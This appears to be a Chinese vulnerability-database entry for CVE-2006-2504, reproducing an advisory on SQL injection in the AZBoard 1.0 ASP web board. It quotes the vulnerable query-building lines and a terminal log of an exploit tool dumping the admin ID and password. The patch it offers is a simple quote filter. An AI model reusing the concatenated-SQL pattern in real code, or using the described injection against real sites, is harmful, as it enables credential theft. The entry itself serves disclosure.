AZBoard 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1194906 漏洞类型 SQL注入
发布时间 2006-05-22 更新时间 2006-05-22
CVE编号 CVE-2006-2504 CNNVD-ID CNNVD-200605-421
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006050122
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-421
|漏洞详情
monoAZBOARD1.0及之前版本存在多个SQL注入漏洞。远程攻击者可以借助对(a)list.asp的(1)search和(2)cate参数,以及对(b)admin_ok.asp的(3)id和cate参数,执行任意SQL指令。
|漏洞EXP
Title : Azboard <= 1.0 Multiple Sql Injections

Published : 2006.5.14

Author : x90c(&#51221;&#44221;&#51452;)@chollian.net/~jyj9782/

Link : http://user.chol.com/~jyj9782/sec/azboard_advisory.txt

0x01 Summary

Azboard is a web board written in asp (active server pages).

It has a sql injection hole. so we can get the admin(bbs)'s

Id and password and so on. let's start to see what is the code..

0x02 Codes

~/azboard/list.asp:

-

49:    if searchstring<>"" then

50:	sql="select count(board_idx) from board where " & search & " like '%" & searchstring & "%' and cate='"&cate&"' "

51:    else

52:	sql="select count(board_idx) from board where cate='"&cate&"'"

53:    end if

-

above lines are vulnerable to sql attak as you can see. y0! ;)~

~/azboard/admin_ok.asp:

-

27: SQL = "SELECT cate,admin_id,admin_pass,board_name FROM board_admin where admin_id='"&id&"' and cate='"&cate&"'"

-

i found the fields('admin_id', 'admin_pass') and table('board_admin') in this file.

0x03 Exploit

[root@ebp exploits]# ls -al azboard_blue.c

-rw-r--r--    1 root     root         4771  5&#50900; 14 23:30 azboard_blue.c

[root@ebp exploits]# ls -al azboard_blue

-rwxr-xr-x    1 root     root        17163  5&#50900; 14 23:30 azboard_blue

[root@ebp exploits]#

[root@ebp exploits]# make azboard_blue

cc     azboard_blue.c   -o azboard_blue

azboard_blue.c: In function `tu1':

azboard_blue.c:55: warning: assignment makes pointer from integer without a cast

azboard_blue.c:59: warning: assignment makes pointer from integer without a cast

azboard_blue.c:63: warning: assignment makes pointer from integer without a cast

azboard_blue.c:67: warning: assignment makes pointer from integer without a cast

[root@ebp exploits]# ./azboard_blue

azaboard 1.0 <= 0day :

$ ./azboard_blue <azboard URL> <cate>

~ x90c (at) chollian (dot) net [email concealed]/~jyj9782

[root@ebp exploits]#

[root@ebp exploits]# ./azboard_blue http://192.168.0.5 testbbs

[ LANG=KOR admin id ] admin

[ LANG=KOR admin pass ] 1234

[root@ebp exploits]#

0x04 Patch

~/azboard/list.asp:

..

if instr(search, "'") > 0 or instr(cate, "'") > 0 or instr(cate, "'") > 0 then

Response.redirect "error.asp"

end if

..

Thanks for many 0p3n-H4ck3rz!

- Blu3h4t Team.
|参考资料

来源:BUGTRAQ
名称:20060515Azboard<=1.0MultipleSqlInjections
链接:http://www.securityfocus.com/archive/1/archive/1/434010/100/0/threaded
来源:MISC
链接:http://user.chol.com/~jyj9782/sec/azboard_advisory.txt
来源:XF
名称:azboard-list-adminok-sql-injection(26495)
链接:http://xforce.iss.net/xforce/xfdb/26495
来源:BID
名称:17990
链接:http://www.securityfocus.com/bid/17990
来源:OSVDB
名称:25528
链接:http://www.osvdb.org/25528
来源:OSVDB
名称:25527
链接:http://www.osvdb.org/25527
来源:VUPEN
名称:ADV-2006-1827
链接:http://www.frsirt.com/english/advisories/2006/1827
来源:SREASON
名称:928
链接:http://securityreason.com/securityalert/928
来源:SECUNIA
名称:20112
链接:http://secunia.com/advisories/20112